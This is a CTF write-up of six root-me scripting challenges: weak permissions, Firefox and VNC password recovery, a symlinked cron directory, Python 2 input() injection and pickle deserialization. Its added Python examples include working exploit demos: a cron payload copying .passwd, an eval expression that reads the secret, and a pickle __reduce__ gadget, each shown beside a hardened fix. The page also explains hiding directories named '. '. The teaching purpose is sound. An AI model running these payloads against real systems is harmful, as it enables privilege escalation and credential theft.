App-Script is the first challenge category on root-me, six challenges in total, described as "These challenges will help you understand scripting vulnerabilities". This article walks through the six challenges and their solutions, but deliberately gives neither tool names/links nor the flags.
1. File - Weak permissions
This challenge provides only the SSH connection details (almost every App-type challenge on root-me provides only connection details, so this will not be repeated below). Once connected to the challenge VM over SSH, "ls -al" shows two files:
-r--r----- 1 shell1        shell1        Jun 1 .netrc
-r--r----- 1 shell1cracked shell1cracked 6 .passwd
A .netrc holds machine/login/password entries for FTP and similar clients. Here it belongs to shell1, the account we log in as, so it is readable to us, whereas .passwd belongs to shell1cracked; a credential file that another account can read is the "weak permission" the title refers to.
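The check a practitioner would run on such a file, as an added example (not code from the original post): report the mode bits the way "ls -l" prints them, whether the current account can read the file, and what the file actually exposes. The .netrc content, host name and password below are constructed; the real challenge file is not reproduced.

```python
import netrc
import os
import stat
import tempfile


def describe_perms(path):
    """Report the mode bits that matter for a credential file, without following symlinks."""
    st = os.lstat(path)
    m = st.st_mode
    return {
        "mode": stat.filemode(m),                    # e.g. '-r--r-----', as ls -l prints it
        "owner_uid": st.st_uid,
        "group_readable": bool(m & stat.S_IRGRP),
        "world_readable": bool(m & stat.S_IROTH),
        "readable_by_me": os.access(path, os.R_OK),  # what matters to the logged-in account
    }


def audit_netrc(path):
    """Combine the permission report with what the file exposes: host/login pairs and whether a password is present."""
    info = describe_perms(path)
    entries = netrc.netrc(path).hosts              # {host: (login, account, password)}
    info["credentials"] = {
        host: {"login": login, "has_password": bool(password)}
        for host, (login, _account, password) in entries.items()
    }
    # A .netrc that carries passwords should be readable by its owner only (mode 0600);
    # anything readable by group or others is the weak permission the challenge is about.
    has_secret = any(c["has_password"] for c in info["credentials"].values())
    info["weak"] = has_secret and (info["group_readable"] or info["world_readable"])
    return info


def demo():
    """Constructed sample: a .netrc with one credential, set to mode 0440 like the -r--r----- in the listing."""
    d = tempfile.mkdtemp()
    path = os.path.join(d, ".netrc")
    with open(path, "w") as f:
        # Constructed entry; host and password are made up for the example.
        f.write("machine ftp.example.test login shell1cracked password constructed-not-real\n")
    os.chmod(path, 0o440)
    return audit_netrc(path)


if __name__ == "__main__":
    print(demo())
```

The stdlib netrc module only enforces owner-only permissions on the default ~/.netrc, which is why the audit does its own stat check rather than relying on the parser.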
2. File - Insecure storage 1
The challenge description is "Mozilla Firefox", so it concerns the Firefox browser. Connecting and listing the challenge directory shows a Firefox user data directory:
dr-xr-x--x 4 shell2 shell2 4096 Feb 6 .mozilla
The goal is therefore to recover a password that Firefox has stored insecurely. For background on how browsers store passwords, see the IDF Lab translation of "How browsers store your passwords"; from it you learn that Firefox salts and encrypts stored passwords, and that the decisive setting is the master password (many Firefox users do not know about it or do not bother to set it, but it makes a huge difference to how securely the passwords are stored). In the challenge's profile directory you find the two files Firefox uses for saved passwords: key3.db, which holds the encryption key, protected by the master password or by an empty password when none has been set, and signons.sqlite, which holds the encrypted logins. Many people open signons.sqlite in a SQLite browser, see a Base64 string and think they have won; in fact the string is only the Base64 encoding of the encrypted data.
There are therefore two ways to solve it. The more direct, brute-force one is to copy the challenge user's .mozilla directory over your own Firefox user data directory and restart Firefox to view the saved passwords. The slightly more technical one is to search for a tool that decrypts Firefox password files (key3.db and signons.sqlite) and run it. Both work only because no master password was set; with one, the copied profile would prompt for it and the decryption tools would need it as well.
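What the "just Base64-decode it" approach actually yields, as an added example (not code from the original post): the decoded bytes are a DER structure, SEQUENCE { keyId OCTET STRING, SEQUENCE { algorithm OID, IV OCTET STRING }, ciphertext OCTET STRING }, the layout the common open-source Firefox decryptors parse, assumed here. The example builds a stand-in for signons.sqlite with the real table and column names but constructed key id, IV and ciphertext bytes, then shows that decoding exposes only the algorithm (3DES-CBC) and opaque ciphertext. Real decryption additionally needs the key from key3.db, which a stdlib-only script cannot unlock, so that part is out of scope.

```python
import base64
import sqlite3

DES_EDE3_CBC = "1.2.840.113549.3.7"   # algorithm OID carried inside Firefox SDR blobs (3DES-CBC)


# --- just enough DER to build and read the SDR container (assumed layout, see lead-in) ---
def _tlv(tag, body):
    n = len(body)
    if n < 0x80:
        return bytes([tag, n]) + body
    nb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(nb)]) + nb + body


def _oid(dotted):
    p = [int(x) for x in dotted.split(".")]
    out = [40 * p[0] + p[1]]
    for v in p[2:]:
        chunk = [v & 0x7F]
        v >>= 7
        while v:
            chunk.append(0x80 | (v & 0x7F))
            v >>= 7
        out += reversed(chunk)
    return _tlv(0x06, bytes(out))


def _read_tlv(buf, pos=0):
    tag, n, pos = buf[pos], buf[pos + 1], pos + 2
    if n & 0x80:
        k = n & 0x7F
        n, pos = int.from_bytes(buf[pos:pos + k], "big"), pos + k
    return tag, buf[pos:pos + n], pos + n


def _children(body):
    items, pos = [], 0
    while pos < len(body):
        tag, val, pos = _read_tlv(body, pos)
        items.append((tag, val))
    return items


def _decode_oid(b):
    parts, v = [b[0] // 40, b[0] % 40], 0
    for x in b[1:]:
        v = (v << 7) | (x & 0x7F)
        if not x & 0x80:
            parts.append(v)
            v = 0
    return ".".join(map(str, parts))


def build_sdr_blob(key_id, iv, ciphertext):
    """Encode SEQUENCE { keyId, SEQUENCE { oid, iv }, ciphertext } and Base64 it, the form stored in signons.sqlite."""
    alg = _tlv(0x30, _oid(DES_EDE3_CBC) + _tlv(0x04, iv))
    return base64.b64encode(_tlv(0x30, _tlv(0x04, key_id) + alg + _tlv(0x04, ciphertext))).decode()


def inspect_sdr_blob(b64):
    """Undo the Base64 and show what is really inside: a key id, an algorithm id with IV, and ciphertext."""
    tag, body, _ = _read_tlv(base64.b64decode(b64))
    if tag != 0x30:
        raise ValueError("not a DER SEQUENCE; not an SDR blob")
    (_, key_id), (_, alg), (_, ct) = _children(body)
    (_, oid), (_, iv) = _children(alg)
    return {"key_id": key_id.hex(), "algorithm": _decode_oid(oid), "iv": iv.hex(), "ciphertext_len": len(ct)}


def sample_signons_db():
    """Constructed stand-in for signons.sqlite: real table/column names, made-up key id, IV and 'ciphertext' bytes."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE moz_logins (id INTEGER PRIMARY KEY, hostname TEXT, "
               "encryptedUsername TEXT, encryptedPassword TEXT, encType INTEGER)")
    key_id = bytes(range(16))                      # constructed; a real one is random
    db.execute("INSERT INTO moz_logins VALUES (1, ?, ?, ?, 1)",
               ("http://www.example.test",
                build_sdr_blob(key_id, b"\x01" * 8, b"\xaa" * 8),
                build_sdr_blob(key_id, b"\x02" * 8, b"\xbb" * 16)))
    return db


def inspect_signons(db):
    """For each login row, decode both blobs; the result is structure and ciphertext, never the plaintext."""
    rows = []
    for host, eu, ep, enc in db.execute(
            "SELECT hostname, encryptedUsername, encryptedPassword, encType FROM moz_logins"):
        rows.append({"hostname": host, "encType": enc,
                     "username": inspect_sdr_blob(eu), "password": inspect_sdr_blob(ep)})
    return rows


if __name__ == "__main__":
    for row in inspect_signons(sample_signons_db()):
        print(row)
```

The ciphertext lengths are multiples of 8, the 3DES block size, which is a quick sanity check that a blob is the SDR format and not something Base64 alone would reveal.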
3. File - Insecure storage 2
The description is "Virtual Network Computing", but the approach is similar to the previous challenge, and it borrows the distraction trick from the first one: the challenge's home directory holds only two entries:
-r--r----- 1 shell3cracked shell3cracked 9 Feb 6 .passwd
dr-xr-x--x 2 shell3        shell3        4096 Oct .vnc
Following the logic of the first challenge, the .passwd file here is only a distraction and can be ignored. The focus is the .vnc directory; as its name says it is related to VNC, so, as in the second challenge, there are two solutions: either search for a VNC password recovery tool, or drop the file over your own VNC configuration. The file is not a hash: the VNC passwd file stores the password obfuscated with DES under a fixed key that is the same in every VNC implementation, so it is trivially reversible, and there is indeed an open-source decoder on GitHub.
4. Bash - cron
This is a tricky one. The title shows only a single word, "crontab", so it obviously concerns Linux scheduled tasks. The challenge directory holds two files and a symbolic link:
-r--r----- 1 shell4cracked shell4cracked Jun 1 .passwd
lrwxrwxrwx 1 shell4        shell4        Jun 1 cron.d -> /tmp/._cron
-r-xr-x--- 1 shell4cracked shell4        579 Nov 00:02 shell4
Logged in as shell4, the only things you can act on are the symlink and the shell4 file, so read shell4: it is a bash script (its content is not reproduced here) which every five minutes executes every task in the cron.d directory and then deletes all the files under it. Since cron.d is a symlink into a location the current user fully controls, the solution is obvious at a glance: drop a script there that reads .passwd. Because the script runs as the account that can read .passwd, not as you, it must also copy the content somewhere you can read it, such as a world-readable file under /tmp.
Because of the five-minute schedule, it takes up to five minutes of patience...
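The mechanism above, rebuilt in a temporary directory as an added example (not the challenge's own script): a naive runner that executes and deletes everything in cron.d, the symlinked job directory the low-privileged account controls, the payload that copies .passwd to a readable location, and a hardened runner that refuses a job directory it does not own outright. The demo runs as a single account, so it models the privilege boundary rather than crossing it; the paths, file contents and the sh-based runner are assumptions, and the flag is constructed.

```python
import os
import stat
import subprocess
import tempfile


def naive_runner(cron_d):
    """Model of the challenge's scheduled script: run every file in cron.d, then delete it. No checks at all."""
    ran = []
    for name in sorted(os.listdir(cron_d)):
        path = os.path.join(cron_d, name)
        subprocess.run(["sh", path], check=False)
        os.remove(path)
        ran.append(name)
    return ran


def hardened_runner(cron_d, expected_uid=None):
    """Same job, but refuse a job directory an unprivileged user could control."""
    st = os.lstat(cron_d)                                   # lstat: do not follow a symlink
    if stat.S_ISLNK(st.st_mode):
        raise PermissionError("cron.d is a symlink; refusing to run jobs from it")
    if not stat.S_ISDIR(st.st_mode):
        raise PermissionError("cron.d is not a directory")
    if st.st_uid != (os.getuid() if expected_uid is None else expected_uid):
        raise PermissionError("cron.d is not owned by the account running the jobs")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        raise PermissionError("cron.d is group- or world-writable")
    return naive_runner(cron_d)


def demo():
    """Rebuild the challenge layout in a temp dir and show the symlinked job directory leaking .passwd."""
    root = tempfile.mkdtemp()
    secret = os.path.join(root, ".passwd")
    with open(secret, "w") as f:
        f.write("constructed-flag-not-real\n")                 # constructed flag
    os.chmod(secret, 0o440)                                     # owner/group readable, as in the listing
    attacker_dir = os.path.join(root, "tmp_cron")               # stands in for /tmp/._cron
    os.makedirs(attacker_dir)
    cron_d = os.path.join(root, "cron.d")
    os.symlink(attacker_dir, cron_d)                            # the 'cron.d -> /tmp/._cron' link
    out = os.path.join(root, "leak")
    with open(os.path.join(attacker_dir, "job.sh"), "w") as f:
        # The payload: copy the secret somewhere the low-privileged account can read.
        f.write(f'cat "{secret}" > "{out}"\nchmod 644 "{out}"\n')
    ran = naive_runner(cron_d)                                  # what the privileged task does
    with open(out) as f:
        leaked = f.read()
    try:
        hardened_runner(cron_d)
        refused = False
    except PermissionError:
        refused = True
    return {"ran": ran, "leaked": leaked, "hardened_refused": refused,
            "jobs_left": os.listdir(attacker_dir)}


if __name__ == "__main__":
    print(demo())
```

The hardened runner's checks are the ones real cron applies to its spool directories: no symlink, correct owner, not writable by anyone else. The symlink check must use lstat; a stat-based check would happily report the target directory's attributes.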
5. Python - input()
The description is "Feed the python!", hinting at Python injection through input(). The goal is to obtain the contents of .passwd, i.e. the flag, by exploiting a vulnerability in the Python script. After connecting over SSH, the challenge directory contains:
-r--r----- 1 shell6cracked shell6cracked   33 2014 .passwd
-r-sr-x--x 1 shell6cracked shell6        7170 May 2014 setuid-wrapper
-r--r----- 1 shell6        shell6          129 May 20 setuid-wrapper.c
-r-xr-x--x 1 shell6        shell6          365 Jun 12 14:46 shell6.py
Only the shell6cracked user and group can read .passwd, and among these files only setuid-wrapper runs with that user's rights (the setuid bit, the "s" in -r-sr-x--x), so the basic idea is to read .passwd through the wrapper's privileges. Fortunately the wrapper's source is available: of the two files we can read, setuid-wrapper.c shows that the wrapper calls shell6.py through system(), while shell6.py reads .passwd and compares its content with the password the user types, printing "Well done! You can validate with this password!" on a match and "Try again ;-)" otherwise.
The path is therefore clear: run setuid-wrapper so that it invokes shell6.py, which reads .passwd with elevated rights. The vulnerability lies in the comparison in shell6.py: the user input is not handled as a plain string before being compared. In Python 2, input() is eval(raw_input()), so whatever is typed is evaluated as a Python expression; all that is needed is to build a Python expression and supply it as the wrapper's input.
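The comparison described above, as an added example rather than the real shell6.py, whose content the page does not reproduce: py2_input() models Python 2's eval-on-input behaviour on Python 3, check_vulnerable() is the reconstructed shape of the check, and check_fixed() treats the input as data (raw_input in Python 2, input in Python 3) and compares in constant time. The injected expression evaluates to the secret itself, so the comparison succeeds; inside the real wrapper the open() would run with the privileged account's rights. The .passwd path and content are constructed.

```python
import hmac
import os
import tempfile

WELCOME = "Well done! You can validate with this password!"
FAIL = "Try again ;-)"


def py2_input(typed):
    """Python 2's input() is eval(raw_input()): the typed text runs as an expression. Modelled here on Python 3."""
    return eval(typed)


def check_vulnerable(typed, passwd_path):
    """Reconstructed shape of the challenge's check: the eval'd input is compared with the file content."""
    with open(passwd_path) as f:
        secret = f.read().strip()
    return WELCOME if py2_input(typed) == secret else FAIL


def check_fixed(typed, passwd_path):
    """Treat the input as a string and compare in constant time."""
    with open(passwd_path) as f:
        secret = f.read().strip()
    return WELCOME if hmac.compare_digest(typed.strip().encode(), secret.encode()) else FAIL


def demo():
    d = tempfile.mkdtemp()
    passwd = os.path.join(d, ".passwd")
    with open(passwd, "w") as f:
        f.write("constructed-secret\n")                      # constructed flag
    # Injected expression: not a password but an expression that evaluates to the secret.
    # An equivalent payload would be __import__('os').system('cat .passwd'), which prints it instead.
    payload = f"open({passwd!r}).read().strip()"
    return {
        "vuln_payload": check_vulnerable(payload, passwd),
        # With Python 2 input(), even an honest guess must be quoted, or it is a NameError.
        "vuln_guess": check_vulnerable("'wrongpassword'", passwd),
        "fixed_payload": check_fixed(payload, passwd),
        "fixed_real": check_fixed("constructed-secret", passwd),
    }


if __name__ == "__main__":
    print(demo())
```

Python 3's input() no longer evaluates its argument, but eval(input()) reproduces the same hole, and ad-hoc string comparison of secrets is still worth replacing with hmac.compare_digest.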
6. Python - pickle
The challenge directory contains:
-rwxr-x--- 1 shell5cracked shell5cracked   83 May 2013 ._run
-r-xr-x--x 1 shell5cracked shell5cracked Mar 7 2013 .passwd
-r--r----- 1 shell5        shell5         138 Nov 2012 README
-r-x--x--- 1 shell5cracked shell5        4763 Jun 1 17:11 shell5
Logged in as shell5, you can only read the README and execute shell5. The README says the HTTP service listens on port 56025 (root-me is a French site; most of its content has an English version, but this README is just two sentences in French, so Google Translate is needed). Executing shell5 produces an error, so the only starting point is the HTTP service on port 56025, which can be reached with curl, with telnet, or with a program you write. The title names pickle, and the Python documentation is explicit that pickle is not secure against erroneous or maliciously constructed data: loading a crafted pickle can execute arbitrary code during deserialization, which is the primitive this challenge is built on.
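The pickle primitive named by the title, as an added example (not the challenge's service, whose protocol the page does not describe): an attacker-side object whose __reduce__ makes the victim's loads() call eval on a chosen expression, beside the allow-list Unpickler the pickle documentation recommends as defence in depth. The file path, the flag and the allow-list are assumptions; the real fix is to not accept pickle from untrusted peers at all and use a data-only format such as JSON.

```python
import builtins
import io
import os
import pickle
import tempfile


class Gadget:
    """Attacker-side object. pickle records the callable and args from __reduce__ and the
    victim's loads() calls them; the victim never needs this class to exist."""

    def __init__(self, expr):
        self.expr = expr

    def __reduce__(self):
        return (builtins.eval, (self.expr,))


def craft_payload(path):
    """Pickle that, when loaded, reads the given file and returns its content as the unpickled object."""
    return pickle.dumps(Gadget(f"open({path!r}).read()"))


class RestrictedUnpickler(pickle.Unpickler):
    """Defence in depth per the pickle docs: only allow-listed globals can be resolved."""
    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "str"), ("builtins", "int")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to resolve {module}.{name}")


def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def demo():
    d = tempfile.mkdtemp()
    passwd = os.path.join(d, ".passwd")
    with open(passwd, "w") as f:
        f.write("constructed-flag-not-real\n")       # constructed flag
    data = craft_payload(passwd)
    leaked = pickle.loads(data)                       # the vulnerable server side: trusts what it receives
    try:
        safe_loads(data)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    # Plain data structures carry no global references, so the restricted loader still accepts them.
    harmless = safe_loads(pickle.dumps({"user": "shell5", "ids": [1, 2, 3]}))
    return {"leaked": leaked, "blocked": blocked, "harmless": harmless}


if __name__ == "__main__":
    print(demo())
```

Sending craft_payload()'s bytes as the request body to a service that pickle.loads() them is the whole exchange; the returned object, or a side effect such as a copied file, is where the flag would surface.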
Digression
Under Linux a file whose name starts with "." is treated as hidden: a plain "ls" does not show it, so this is a common way to hide data or files, but adding the "-a" option reveals it. Another way to hide a directory is to name it "." or ".." followed by a space, e.g. mkdir ". ", so that even in "ls -a" output it is easily confused with, or overlooked among, the regular "." and ".." entries every Linux directory has.
(End)